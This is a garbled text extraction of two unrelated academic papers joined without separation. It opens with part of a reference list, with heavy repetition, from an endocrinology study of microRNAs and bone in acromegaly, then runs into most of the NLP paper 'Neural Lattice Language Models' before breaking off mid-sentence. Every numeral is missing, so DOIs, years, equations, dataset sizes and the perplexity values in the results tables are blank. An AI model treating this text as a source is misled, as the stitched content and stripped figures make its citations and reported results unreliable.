https://doi.org/ . /j.bone. . . https://doi.org/ . /s - - -z https://doi.org/ . /s - - -z https://doi.org/ . /jbmr. https://doi.org/ . /eje- - https://doi.org/ . /eje- - https://doi.org/ . /cen. https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /j.ymeth. . . https://doi.org/ . /j.ymeth. . . https://doi.org/ . /er. - https://doi.org/ . /er. - https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /eje. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : compromises bonr quality in acromegaly. endocrine-related cancer – . (https://doi.org/ . /erc- - ) komori t, yagi h, nomura s, yamaguchi a, sasaki k, deguchi k, shimizu y, bronson rt, gao yh, inada m, et al. targeted disruption of cbfa results in a complete lack of bone formation owing to maturational arrest of osteoblasts. cell – . (https://doi. org/ . /s - ( ) - ) cohen mm jr. perspectives on runx genes: an update. american journal of medical genetics part a – . (https://doi. org/ . /ajmg.a. ) godang k, olarescu nc, bollerslev j & heck a. treatment of acromegaly increases bmd but reduced trabecular bone score: a longitudinal study. european journal of endocrinology – . (https://doi.org/ . /eje- - ) shah r, licata a, oyesiku nm & ioachimescu ag. acromegaly as a cause of , -dihydroxyvitamin d-dependent hypercalcemia: case reports and review of the literature. pituitary s –s . (https://doi.org/ . /s - - - ) valassi e, crespo i, malouf j, vilades d, leta r, llauger j, urgell e, aulinas a, marin am, biagetti b, et al. epicardial fat is a negative predictor of spine volumetric bone mineral density and trabecular bone score in acromegaly. endocrine – . (https://doi. org/ . /s - - - ) giustina a, chanson p, kleinberg d, bronstein md, clemmons dr, klibanski a, van der lely aj, strasburger cj, lamberts sw, ho kky, et al. expert consensus document: a consensus on the medical treatment of acromegaly. nature reviews endocrinology – . (https://doi.org/ . / nrendo. . ) biermasz nr, hamdy nat, pereira am, romijn ja & roelfesma f. long-term maintenance of the anabolic effects of gh on the skeleton in successfully treated patients with acromegaly. european journal of endocrinology – . (https://doi.org/ . / eje. . ) melmed s, colao a, barkan a, molitch m, grossman ab, kleinberg d, clemmons d, chanson p, laws e, schlechte j, et al. guideline for acromegaly management. an update. journal of clinical endocrinology and metabolism – . (https://doi.org/ . / jc. - ) zhang jx, song w, chen zh, wei jh, liao yj, lei j, hu m, chen gz, liao b, lu j, et al. prognostic and predictive value of a microrna signature in stage ii colon cancer: a microrna expression analysis. lancet oncology – . (https://doi.org/ . /s - ( ) - ) fasihi a, soltani bm, atashi a & nasiri s. introduction of hsa-mir- a and hsa-mir- and hsa-mir- as new regulators of wnt signaling pathway and their relation to colorectal carcinoma. journal of cell biochemistry – . (https://doi.org/ . /jcb. ) shen y, ye yf, ruan lw, bao l, wu mw & zhou y. inhibition of mir- - p expression suppresses tumor development and metastasis in human breast cancer. genetics and molecular research . (https://doi.org/ . /gmr ) bye a, røsjø h, nauman j, silva gj, follestad t, omland t & wisløff u. circulating micrornas predict future fatal myocardial infarction in healthy individuals – the hunt study. journal of molecular and cellular cardiology – . (https://doi.org/ . /j. yjmcc. . . ) jakob p, kacprowski t, briand-schumacher s, heg d, klingenberg r, stähli be, jaguszewski m, rodondi n, nanchen d, räber l, et al. profiling and validation of circulating micrornas for cardiovascular events in patients presenting with st-segment elevation myocardial infarction. european heart journal – . (https://doi. org/ . /eurheartj/ehw ) chen p, pan x, zhao l, jin l, lin c, quan j, he t, zhou l, wu x, wang y, et al. microrna- - p exerts a tumor suppressive role in renal cell carcinoma. experimental and therapeutic medicine – . (https://doi.org/ . /etm. . ) received in final form december accepted december accepted preprint published online december this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /erc- - https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /ajmg.a. https://doi.org/ . /ajmg.a. https://doi.org/ . /eje- - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /nrendo. . https://doi.org/ . /nrendo. . https://doi.org/ . /eje. . https://doi.org/ . /eje. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /jcb. https://doi.org/ . /gmr https://doi.org/ . /gmr https://doi.org/ . /j.yjmcc. . . https://doi.org/ . /j.yjmcc. . . https://doi.org/ . /eurheartj/ehw https://doi.org/ . /eurheartj/ehw https://doi.org/ . /etm. . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract subjects and methods subjects biochemical measurements radiological imaging mirna isolation from serum samples mirna selection microrna real-time qpcr hemolysis assessment statistical analysis results clinical characteristics and bone parameters differentially expressed micrornas acro vs controls relationship between serum mirnas and bone parameters discussion supplementary data declaration of interest funding acknowledgement references neural lattice language models jacob buckman language technologies institute carnegie mellon university jacobbuckman@gmail.com graham neubig language technologies institute carnegie mellon university gneubig@cs.cmu.edu abstract in this work, we propose a new language mod- eling paradigm that has the ability to perform both prediction and moderation of informa- tion flow at multiple granularities: neural lat- tice language models. these models con- struct a lattice of possible paths through a sen- tence and marginalize across this lattice to cal- culate sequence probabilities or optimize pa- rameters. this approach allows us to seam- lessly incorporate linguistic intuitions – in- cluding polysemy and the existence of multi- word lexical items – into our language model. experiments on multiple language modeling tasks show that english neural lattice language models that utilize polysemous embeddings are able to improve perplexity by . % rela- tive to a word-level baseline, and that a chi- nese model that handles multi-character to- kens is able to improve perplexity by . % relative to a character-level baseline. introduction neural network models have recently contributed to- wards a great amount of progress in natural language processing. these models typically share a common backbone: recurrent neural networks (rnn), which have proven themselves to be capable of tackling a variety of core natural language processing tasks (hochreiter and schmidhuber, ; elman, ). one such task is language modeling, in which we estimate a probability distribution over sequences of tokens that corresponds to observed sentences (§ ). neural language models, particularly models con- ditioned on a particular input, have many applica- tions including in machine translation (bahdanau et al., ), abstractive summarization (chopra et al., ), and speech processing (graves et al., ). dogs chased the small cat dogs chased the small cat dogs chased the small dogs chased the the_small the_small_cat small_cat dogs_chasedchased chased_the dogs_chased_the chased_the_small figure : lattice decomposition of a sentence and its cor- responding lattice language model probability calculation similarly, state-of-the-art language models are al- most universally based on rnns, particularly long short-term memory (lstm) networks (jozefowicz et al., ; inan et al., ; merity et al., ). while powerful, lstm language models usually do not explicitly model many commonly-accepted linguistic phenomena. as a result, standard mod- els lack linguistically informed inductive biases, po- tentially limiting their accuracy, particularly in low- data scenarios (adams et al., ; koehn and knowles, ). in this work, we present a novel modification to the standard lstm language mod- eling framework that allows us to incorporate some varieties of these linguistic intuitions seamlessly: neural lattice language models (§ . ). neural lat- tice language models define a lattice over possi- ble paths through a sentence, and maximize the marginal probability over all paths that lead to gen- erating the reference sentence, as shown in fig. . depending on how we define these paths, we can in- corporate different assumptions about how language should be modeled. in the particular instantiations of neural lattice language models covered by this paper, we focus on two properties of language that could potentially be of use in language modeling: the existence of multi- word lexical units (zgusta, ) (§ . ) and poly- transactions of the association for computational linguistics, vol. , pp. – , . action editor: holger schwenk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. semy (ravin and leacock, ) (§ . ). neural lat- tice language models allow the model to incorporate these aspects in an end-to-end fashion by simply ad- justing the structure of the underlying lattices. we run experiments to explore whether these modifications improve the performance of the model (§ ). additionally, we provide qualitative visualiza- tions of the model to attempt to understand what types of multi-token phrases and polysemous em- beddings have been learned. background . language models consider a sequence x for which we want to cal- culate its probability. assume we have a vocabulary from which we can select a unique list of |x| tokens x ,x , . . . ,x|x| such that x = [x ;x ; . . . ;x|x|], i.e. the concatenation of the tokens (with an appro- priate delimiter). these tokens can be either on the character level (hwang and sung, ; ling et al., ) or word level (inan et al., ; merity et al., ). using the chain rule, language models gen- erally factorize p(x) in the following way: p(x) = p(x ,x , . . . ,x|x|) = |x|∏ t= p(xt | x ,x , . . . ,xt− ). ( ) note that this factorization is exact only in the case where the segmentation is unique. in character- level models, it is easy to see that this property is maintained, because each token is unique and non- overlapping. in word-level models, this also holds, because tokens are delimited by spaces, and no word contains a space. . recurrent neural networks recurrent neural networks have emerged as the state-of-the-art approach to approximating p(x). in particular, the lstm cell (hochreiter and schmid- huber, ) is a specific rnn architecture which has been shown to be effective on many tasks, in- cluding language modeling (press and wolf, ; jozefowicz et al., ; merity et al., ; inan et al., ). lstm language models recursively cal- in this work, we utilize an lstm with linked input and forget gates, as proposed by greff et al. ( ). culate the hidden and cell states (ht and ct respec- tively) given the input embedding et− correspond- ing to token xt− : ht,ct = lstm(ht− ,ct− ,et− ,θ), ( ) then calculate the probability of the next token given the hidden state, generally by performing an affine transform parameterized by w and b, followed by a softmax: p(xt | ht) := softmax(w ∗ht + b). ( ) neural lattice language models . language models with ambiguous segmentations to reiterate, the standard formulation of language modeling in the previous section requires splitting sentence x into a unique set of tokens x , . . . ,x|x|. our proposed method generalizes the previous for- mulation to remove the requirement of uniqueness of segmentation, similar to that used in non-neural n-gram language models such as dupont and rosen- feld ( ) and goldwater et al. ( ). first, we define some terminology. we use the term “token”, designated by xi, to describe any in- divisible item in our vocabulary that has no other vocabulary item as its constituent part. we use the term “chunk”, designated by ki or x j i , to describe a sequence of one or more tokens that represents a portion of the full string x, containing the unit to- kens xi through xj: x j i = [xi,xi+ ; . . . ;xj]. we also refer to the “token vocabulary”, which is the subset of the vocabulary containing only tokens, and to the “chunk vocabulary”, which similarly contains all chunks. note that we can factorize the probability of any sequence of chunks k using the chain rule, in pre- cisely the same way as sequences of tokens: p(k) = p(k ,k , . . . ,k|k|) = |k|∏ t= p(kt | k ,k , . . . ,kt− ). ( ) we can factorize the overall probability of a to- ken list x in terms of its chunks by using the chain rule, and marginalizing over all segmentations. for any particular token list x, we define a set of valid segmentations s(x), such that for every sequence s ∈ s(x), x = [xs − s ;x s − s ; . . . ;x s|s| s|s|− ]. the factorization is: p(x) = ∑ s p(x,s) = ∑ s p(x|s)p(s) = ∑ s∈s(x) p(s) = ∑ s∈s(x) |s|∏ t= p(xst− st− | x s − s ,xs − s , . . . ,x st− − st− ). ( ) note that, by definition, there exists a unique seg- mentation of x such that x ,x , . . . are all tokens, in which case |s| = |x|. when only that one unique segmentation is allowed per x, s contains only that one element, so summation drops out, and therefore for standard character-level and word-level models, eq. ( ) reduces to eq. ( ), as desired. however, for models that license multiple segmentations per x, computing this marginalization directly is gener- ally intractable. for example, consider segmenting a sentence using a vocabulary containing all words and all -word expressions. the size of s would grow exponentially with the number of words in x, meaning we would have to marginalize over tril- lions of unique segmentations for even modestly- sized sentences. . lattice language models to avoid this, it is possible to re-organize the com- putations in a lattice, which allows us to dramati- cally reduce the number of computations required (dupont and rosenfeld, ; neubig et al., ). all segmentations of x can be expressed as the edges of paths through a lattice over token-level pre- fixes of x: x< ,x< , . . . ,x. the infimum is the empty prefix x< ; the supremum is x; an edge from prefix x<i to prefix x<j exists if and only if there exists a chunk xji in our chunk vocabulary such that [x<i;x j i ] = x<j. each path through the lattice from x< to x is a segmentation of x into the list of to- kens on the traversed edges, as seen in fig. . the probability of a specific prefix p(x<j) is calculated by marginalizing over all segmentations leading up to xj− p(x<j) = ∑ s∈s(x<j) |s|∏ t= p(xst− st− | x<st− ), ( ) where by definition s|s| = j. the key insight here that allows us to calculate this efficiently is that this is a recursive formula and that instead of marginaliz- ing over all segmentations, we can marginalize over immediate predecessor edges in the lattice, aj. each item in aj is a location i (= st− ), which indicates that the edge between prefix x<i and prefix x<j, cor- responding to token xji , exists in the lattice. we can thus calculate p(x<j) as p(x<j) = ∑ i∈aj p(x<i)p(x j i | x<i). ( ) since x is the supremum prefix node, we can use this formula to calculate p(x) by setting j = |x|. in order to do this, we need to calculate the proba- bility of each of its |x| predecessors. each of those takes up to |x| calculations, meaning that the com- putation for p(x) can be done in o(|x| ) time. if we can guarantee that each node will have a maxi- mum number of incoming edges d so that |aj| ≤ d for all j, then this bound can be reduced to o(d|x|) time. the proposed technique is completely agnostic to the shape of the lattice, and fig. illustrates several potential varieties of lattices. depending on how the lattice is constructed, this approach can be useful in a variety of different contexts, two of which we dis- cuss in § . . neural lattice language models there is still one missing piece in our attempt to ap- ply neural language models to lattices. within our overall probability in eq. ( ), we must calculate the probability p(xji | x<i) of the next segment given the history. however, given that there are potentially an exponential number of paths through the lattice leading to xi, this is not as straightforward as in the case where only one segmentation is possible. pre- vious work on lattice-based language models (neu- big et al., ; dupont and rosenfeld, ) uti- lized count-based n-gram models, which depend on only a limited historical context at each step mak- ing it possible to compute the marginal probabilities in an exact and efficient manner through dynamic programming. on the other hand, recurrent neural thus, the standard token-level language model where d = takes o(|x|) computations. the dog barked . the dog barked . the dog dog barked . the dog barked . the dog dog barked barked . the dog barked . dog barked (a) (b) (c) (d) figure : example of (a) a single-path lattice, (b) a sparse lattice, (c) a dense lattice with d = , and (d) a multilat- tice with d = , for sentence “the dog barked .” models depend on the entire context, causing them to lack this ability. our primary technical contribu- tion is therefore to describe several techniques for incorporating lattices into a neural framework with infinite context, by providing ways to approximate the hidden state of the recurrent neural net. . . direct approximation one approach to approximating the hidden state is the treelstm framework described by tai et al. ( ). in the treelstm formulation, new states are derived from multiple predecessors by simply summing the individual hidden and cell state vec- tors of each of them. for each predecessor location i ∈ aj, we first calculate the local hidden state h̃ and local cell state c̃ by combining the embedding e j i with the hidden state of the lstm at x<i using the standard lstm update function as in eq. ( ): h̃i, c̃i = lstm(hi,ci,e j i,θ) for i ∈ aj. we then sum the local hidden and cell states: hj = ∑ i∈aj h̃i cj = ∑ i∈aj c̃i. this framework has been used before for calculating neural sentence representations involving lattices by su et al. ( ) and sperber et al. ( ), but not for the language models that are the target of this paper. this formulation is powerful, but comes at the cost of sacrificing the probabilistic interpretation of which paths are likely. therefore, even if almost all of the probability mass comes through the “true” segmentation, the hidden state may still be heavily influenced by all of the “bad” segmentations as well. . . monte-carlo approximation another approximation that has been proposed is to sample one predecessor state from all possible predecessors, as seen in chan et al. ( ). we can calculate the total probability that we reach some prefix x<j, and we know how much of this prob- ability comes from each of its predecessors in the lattice, so we can construct a probability distribution over predecessors in the lattice: m(x<i | θ) = p(x<i | θ)p(xji | x<i;θ) p(x<j | θ) . ( ) therefore, one way to update the lstm is to sam- ple one predecessor x<i from the distribution m and simply set hj = h̃i and cj = c̃i. however, sampling is unstable and difficult to train: we found that the model tended to over-sample short tokens early on during training, and thus segmented every sentence into unigrams. this is similar to the outcome re- ported by chan et al. ( ), who accounted for it by incorporating an � encouraging exploration. . . marginal approximation in another approach, which allows us to incorpo- rate information from all predecessors while main- taining a probabilistic interpretation, we can utilize the probability distribution m to instead calculate the expected value of the hidden state: hj = ex<i∼m[h̃i] = ∑ i∈aj m(x<i | θ)h̃i cj = ex<i∼m[c̃i] = ∑ i∈aj m(x<i | θ)c̃i. . . gumbel-softmax interpolation the gumbel-softmax trick, or concrete distribu- tion, described by jang et al. ( ) and maddi- son et al. ( ), is a technique for incorporating discrete choices into differentiable neural computa- tions. in this case, we can use it to select a prede- cessor. the gumbel-softmax trick works by taking advantage of the fact that adding gumbel noise to the pre-softmax predecessor scores and then taking the argmax is equivalent to sampling from the prob- ability distribution. by replacing the argmax with a softmax function scaled by a temperature τ, we can get this pseudo-sampled distribution through a fully differentiable computation: n(x<i | θ) = exp((log(m(x<i | θ)) + gi)/τ)∑ k∈aj exp((log(m(x<k | θ)) + gk)/τ) . this new distribution can then be used to calculate the hidden state by taking a weighted average of the states of possible predecessors: hj = j− ∑ i∈aj n(x<i | θ)h̃i cj = j− ∑ i=j−l n(x<i | θ)c̃i. when τ is large, the values of n(x<i | θ) are flattened out; therefore, all the predecessor hidden states are summed with approximately equal weight, equivalent to the direct approximation (§ . . ). on the other hand, when τ is small, the output distri- bution becomes extremely peaky, and one predeces- sor receives almost all of the weight. each prede- cessor x<i has a chance of being selected equal to m(x<i | θ), which makes it identical to ancestral sampling (§ . . ). by slowly annealing the value of τ, we can smoothly interpolate between these two approaches, and end up with a probabilistic interpre- tation that avoids the instability of pure sampling- based approaches. instantiations of neural lattice lms in this section, we introduce two instantiations of neural lattice languages models aiming to capture features of language: the existence of coherent multi-token chunks, and the existence of polysemy. . incorporating multi-token phrases . . motivation natural language phrases often demonstrate sig- nificant non-compositionality: for example, in en- glish, the phrase “rock and roll” is a genre of mu- sic, but this meaning is not obtained by viewing the words in isolation. in word-level language model- ing, the network is given each of these words as in- put, one at a time; this means it must capture the id- iomaticity in its hidden states, which is quite round- about and potentially a waste of the limited param- eters in a neural network model. a straightforward solution is to have an embedding for the entire multi- token phrase, and use this to input the entire phrase to the lstm in a single timestep. however, it is also important that the model is able to decide whether the non-compositional representation is appropriate given the context: sometimes, “rock” is just a rock. additionally, by predicting multiple tokens in a single timestep, we are able to decrease the num- ber of timesteps across which the gradient must travel, making it easier for information to be prop- agated across the sentence. this is even more useful in non-space-delimited languages such as chinese, in which segmentation is non-trivial, but character- level modeling leads to many sentences being hun- dreds of tokens long. there is also psycho-linguistic evidence which supports the fact that humans incorporate multi- token phrases into their mental lexicon. siyanova- chanturia et al. ( ) show that native speakers of a language have significantly reduced response time when processing idiomatic phrases, whether they are used in an idiomatic sense or not, while bannard and matthews ( ) show that children learning a lan- guage are better at speaking common phrases than uncommon ones. this evidence lends credence to the idea that multi-token lexical units are a useful tool for language modeling in humans, and so may also be useful in computational models. . . modeling strategy the underlying lattices utilized in our multi-token phrase experiments are “dense” lattices: lattices where every edge (below a certain length l) is present (fig. , c). this is for two reasons. first, since every sequence of tokens is given an oppor- tunity to be included in the path, all segmentations are candidates, which will potentially allow us to discover arbitrary types of segmentations without a prejudice towards a particular theory of which multi- token units we should be using. second, using a dense lattice makes minibatching very straightfor- ward by ensuring that the computation graphs for each sentence are identical. if the lattices were not dense, the lattices of various sentences in a mini- batch could be different; it then becomes necessary to either calculate a differently-shaped graph for ev- ery sentence, preventing minibatching and hurting training efficiency, or calculate and then mask out the missing edges, leading to wasted computation. since only edges of length l or less are present, the maximum in-degree of any node in the lattice d is no greater than l, giving us the time bound o(l|x|). . . token vocabularies storing an embedding for every possible multi- token chunk would require |v |l unique embed- dings, which is intractable. therefore, we construct our multi-token embeddings by merging composi- tional and non-compositional representations. non-compositional representation we first es- tablish a priori set of “core” chunk-level tokens, each have a dense embedding. in order to guarantee full coverage of sentences, we first add every unit-level token to this vocabulary, e.g. every word in the cor- pus for a word-level model. following this, we also add the most frequent n-grams (where < n ≤ l). this ensures that the vast majority of sentences will have several longer chunks appear within them, and so will be able to take advantage of tokens at larger granularities. compositional representation however, the non-compositional embeddings above only account for a subset of all n-grams, so we additionally construct compositional embeddings for each chunk by running a bilstm encoder over the individual embeddings of each unit-level token within it (dyer et al., ). in this way, we can create a unique embedding for every sequence of unit-level tokens. we use this composition function on chunks regardless of whether they are assigned non- compositional embeddings or not, as even high- frequency chunks may display compositional prop- erties. thus, for every chunk, we compute the chunk embedding vector xji by concatenating the compo- sitional embedding with the non-compositional em- bedding if it exists, or otherwise with an <unk> embedding. sentinel mixture model for predictions at each timestep, we want to use our lstm hidden state ht to assign some probability mass to every chunk with a length less than l. to do this, we follow merity et al. ( ) in creating a new “sentinel” token <s> and adding it to our vocabulary. at each timestep, we first use our neural network to calculate a score for each chunk c in our vocabulary, including the sentinel token. we do a softmax across these scores to assign a probability pmain(ct+ | ht;θ) to every chunk in our vocabulary, and also to <s>. for token sequences not represented in our chunk vocabulary, this probability pmain(ct+ | ht;θ) = . next, the probability mass assigned to the sentinel value, pmain(<s> | ht;θ), is distributed across all possible tokens sequences of length less than l, us- ing another lstm with parameters θsub. similar to jozefowicz et al. ( ), this sub-lstm is initial- ized by passing in the hidden state of the main lattice lstm at that timestep. this gives us a probability for each sequence psub(c ,c , . . . ,cl | ht;θsub). the final formula for calculating the probability mass assigned to a specific chunk c is: p(c | ht;θ) =pmain(c | ht;θ)+ pmain(<s> | ht;θ)psub(c | ht;θsub). . incorporating polysemous tokens . . motivation a second shortcoming of current language mod- eling approaches is that each word is associated with only one embedding. for highly polysemous words, a single embedding may be unable to represent all meanings effectively. there has been past work in word embeddings which has shown that using multiple embeddings for each word is helpful in constructing a useful repre- sentation. athiwaratkun and wilson ( ) repre- sented each word with a multimodal gaussian dis- tribution and demonstrated that embeddings of this form were able to outperform more standard skip- gram embeddings on word similarity and entailment tasks. similarly, chen et al. ( ) incorporate standard skip-gram training into a gaussian mixture framework and show that this improves performance on several word similarity benchmarks. when a polysemous word is represented using only a single embedding in a language modeling task, the multimodal nature of the true embedding distribution may causes the resulting embedding to be both high-variance and skewed from the positions of each of the true modes. thus, it is likely useful to represent each token with multiple embeddings when doing language modeling. . . modeling strategy for our polysemy experiments, the underlying lat- tices are multi-lattices: lattices which are also multi- graphs, and can have any number of edges between any given pair of nodes (fig. , d). lattices set up in this manner allow us to incorporate multiple em- beddings for each word. within a single sentence, any pair of nodes corresponds to the start and end of a particular subsequence of the full sentence, and is thus associated with a specific token. each edge between them is a unique embedding for that to- ken. while many strategies for choosing the num- ber of embeddings exist in the literature (neelakan- tan et al., ), in this work, we choose a number of embeddings e and assign that many embeddings to each word. this ensures that the maximum in- degree of any node in the lattice d, is no greater than e, giving us the time bound o(e|x|). in this work, we do not explore models that in- clude both chunk vocabularies and multiple embed- dings. however, combining these two techniques, as well as exploring other, more complex lattice struc- tures, is an interesting avenue for future work. experiments . data we perform experiments on two languages: english and chinese, which provide an interesting contrast in linguistic features. in english, the most common benchmark for language modeling recently is the penn tree- bank, specifically the version preprocessed by tomáš mikolov ( ). however, this corpus is lim- ited by being relatively small, only containing ap- proximately , sentences, which we found to be insufficient to effectively train lattice language mod- els. thus, we instead used the billion word corpus (chelba et al., ). past experiments on the bwc typically modeled every word without restricting the vocabulary, which results in a number of challenges regarding the modeling of open vocabularies that are orthogonal to this work. thus, we create a pre- code to reproduce datasets and experiments is available at: http://github.com/jbuckman/ neural-lattice-language-models experiments using multi-word units resulted in overfitting, regardless of normalization and hyperparameter settings. processed version of the data in the same manner as mikolov, lowercasing the words, replacing num- bers with <n> tokens, and <unk>ing all words beyond the ten thousand most common. addition- ally, we restricted the data set to only include sen- tences of length or less, ensuring that large mini- batches could fit in gpu memory. our subsampled english corpus contained , , sentences, of which , , were used for training, , for validation, and , for testing. to validate that our methods scale up to larger language modeling scenarios, we also report a smaller set of large-scale experiments on the full billion word benchmark in appendix a. in chinese, we ran experiments on a subset of the chinese gigaword corpus. chinese is also par- ticularly interesting because unlike english, it does not use spaces to delimit words, so segmentation is non-trivial. therefore, we used a character-level lan- guage model for the baseline, and our lattice was composed of multi-character chunks. we used sen- tences from guangming daily, again <unk>ing all but the , most common tokens and restrict- ing the selected sentences to only include sentences of length or less. our subsampled chinese cor- pus included , sentences for training, , for validation, and , for testing. . main experiments we compare a baseline lstm model, dense lattices of size , , and , and a multilattice with and embeddings per word. the implementation of our networks was done in dynet (neubig et al., ). all lstms had lay- ers, each with a hidden dimension of . vari- ational dropout (gal and ghahramani, ) of . was used on the chinese experiments, but hurt per- formance on the english data, so it was not used. the , word embeddings each had dimension . for lattice models, chunk vocabularies were se- lected by taking the , words in the vocabulary and adding the most common , n-grams with < n ≤ l. the weights on the final layer of the net- work were tied with the input embeddings, as done by press and wolf ( ) and inan et al. ( ). in all lattice models, hidden states were computed using a weighted expectation (§ . . ) unless men- tioned otherwise. in multi-embedding models, em- table : results on english language modeling task model valid. perp. test perp. baseline . . multi-token (l = ) . . multi-token (l = ) . . multi-token (l = ) . . multi-emb (e = ) . . multi-emb (e = ) . . table : results on chinese language modeling task model valid. perp. test perp. baseline . . multi-token (l = ) . . multi-token (l = ) . . multi-token (l = ) . . multi-emb (e = ) . . multi-emb (e = ) . . bedding sizes were decreased so as to maintain the same total number of parameters. all models were trained using the adam optimizer with a learning rate of . on a nvidia k gpu. the results can be seen in table and table . in the multi-token phrase experiments, many ad- ditional parameters are accrued by the bilstm encoder and sub-lstm predictive model, making them not strictly comparable to the baseline. to ac- count for this, we include results for l = , which, like the baseline lstm approach, fails to leverage multi-token phrases, but includes the same number of parameters as l = and l = . in both the english and chinese experiments, we see the same trend: increasing the maximum lat- tice size decreases the perplexity, and for l = and above, the neural lattice language model outper- forms the baseline. similarly, increasing the number of embeddings per word decreases the perplexity, and for e = and above, the multiple-embedding model outperforms the baseline. . hidden state calculation experiments we compare the various hidden-state calculation ap- proaches discussed in section . on the english data using a lattice of size l = and dropout of . . these results can be seen in table . table : hidden state calculation comparison results model valid. perp. test perp. baseline . . direct (§ . . ) . . monte carlo (§ . . ) . . marginalization (§ . . ) . . gs interpolation (§ . . ) . . for all hidden state calculation techniques, the neural lattice language models outperform the lstm baseline. the ancestral sampling technique used by chan et al. ( ) is worse than the others, which we found to be due to it getting stuck in a lo- cal minimum which represents almost everything as unigrams. there is only a small difference between the perplexities of the other techniques. . discussion and analysis neural lattice language models convincingly out- perform an lstm baseline on the task of lan- guage modeling. one interesting note is that in en- glish, which is already tokenized into words and highly polysemous, utilizing multiple embeddings per word is more effective than including multi- word tokens. in contrast, in the experiments on the chinese data, increasing the lattice size of the multi- character tokens is more important than increasing the number of embeddings per character. this cor- responds to our intuition; since chinese is not tok- enized to begin with, utilizing models that incorpo- rate segmentation and compositionality of elemen- tary units is very important for effective language modeling. to calculate the probability of a sentence, the neural lattice language model implicitly marginal- izes across latent segmentations. by inspecting the probabilities assigned to various edges of the lattice, we can visualize these segmentations, as is done in fig. . the model successfully identifies bi- grams which correspond to non-compositional com- pounds, like “prime minister”, and bigrams which correspond to compositional compounds, such as “a quarter”. interestingly, this does not occur for all high-frequency bigrams; it ignores those that are not inherently meaningful, such as “<unk> in”, yield- ing qualitatively good phrases. in the multiple-embedding experiments, it is pos- figure : segmentation of three sentences randomly sampled from the test corpus, using l = . green numbers show probability assigned to token sizes. for example, the first three words in the first sentence have a % and % chance of being “please let me” or “please let me” respectively. boxes around words show greedy segmentation. table : comparison of randomly-selected contexts of several words selected from the vocabulary of the billion word corpus, in which the model preferred one embedding over the other. rock rock ...at the <unk> pop , rock and jazz... ...including hsbc , northern rock and... ...a little bit <unk> rock ,... ...pakistan has a <unk> rock music scene... ...on light rock and <unk> stations... ...spokesman for round rock , <unk>... bank bank ...being a bank holiday in... ...the bank of england has... ...all the us bank runs and... ...with the royal bank of scotland... ...by getting the bank ’s interests... ...development bank of japan and the... page page ...on page <unk> of the... ...was it front page news... ...a source told page six .... ...himself , tony page , the former ... ...on page <unk> of the... ...sections of the page that discuss... profile profile ...( <unk> : quote , profile , research )... ...so <unk> the profile of the city... ...( <unk> : quote , profile , research )... ...the highest profile <unk> held by... ...( <unk> : quote , profile , research )... ...from high i , elite schools ,... edition edition ... of the second edition of windows... ...of the new york edition . ... ... this month ’s edition of<unk> , the ... ...of the new york edition . ... ...forthcoming d.c. edition of the hit... ...of the new york edition . ... rodham rodham ...senators hillary rodham clinton and... ...making hillary rodham clinton his... ...hillary rodham clinton ’s campaign has... sible to see which of the two embeddings of a word was assigned the higher probability for any specific test-set sentence. in order to visualize what types of meanings are assigned to each embedding, we select sentences in which one embedding is preferred, and look at the context in which the word is used. sev- eral examples of this can be seen in table ; it is clear from looking at these examples that the system does learn distinct embeddings for different senses of the word. what is interesting, however, is that it does not necessarily learn intuitive semantic mean- ings; instead it tends to group the words by the con- text in which they appear. in some cases, like profile and edition, one of the two embeddings simply cap- tures an idiosyncrasy of the training data. additionally, for some words, such as rodham in table , the system always prefers one embedding. this is promising, because it means that in future work it may be possible to further improve accu- racy and training efficiency by assigning more em- beddings to polysemous words, instead of assigning the same number of embeddings to all words. related work past work that utilized lattices in neural models for natural language processing centers around us- ing these lattices in the encoder portion of machine translation. su et al. ( ) utilized a variation of the gated recurrent unit (gru) that operated over lattices, and preprocessed lattices over chi- nese characters that allowed it to effectively encode multiple segmentations. additionally, sperber et al. ( ) proposed a variation of the treelstm with the goal of creating an encoder over speech lattices in speech-to-text. our work tackles language mod- eling rather than encoding, and thus addresses the issue of marginalization over the lattice. another recent work which marginalized over multiple paths through a sentence is ling et al. ( ). the authors tackle the problem of code gen- eration, where some components of the code can be copied from the input, via a neural network. our work expands on this by handling multi-word tokens as input to the neural network, rather than passing in one token at a time. neural lattice language models improve accuracy by helping the gradient flow over smaller paths, pre- venting vanishing gradients. many hierarchical neu- ral language models have been proposed with a sim- ilar objective (koutnik et al., ; zhou et al., ). our work is distinguished from these by the use of latent token-level segmentations that cap- ture meaning directly, rather than simply being high- level mechanisms to encourage gradient flow. chan et al. ( ) propose a model for predict- ing characters at multiple granularities in the de- coder segment of a machine translation system. our work expands on theirs by considering the entire lat- tice at once, rather than considering a only a sin- gle path through the lattice via ancestral sampling. this allows us to train end-to-end without the model collapsing to a local minimum, with no exploration bonus needed. additionally, we propose a more broad class of models, including those incorporat- ing polysemous words, and apply our model to the task of word-level language modeling, rather than character-level transcription. concurrently to this work, van merriënboer et al. ( ) have proposed a neural language model that can similarly handle multiple scales. our work is differentiated in that it is more general: utilizing an open multi-token vocabulary, proposing multiple techniques for hidden state calculation, and handling polysemy using multi-embedding lattices. future work in the future, we would like to experiment with uti- lizing neural lattice language models in extrinsic evaluation, such as machine translation and speech recognition. additionally, in the current model, the non-compositional embeddings must be selected a priori, and may be suboptimal. we 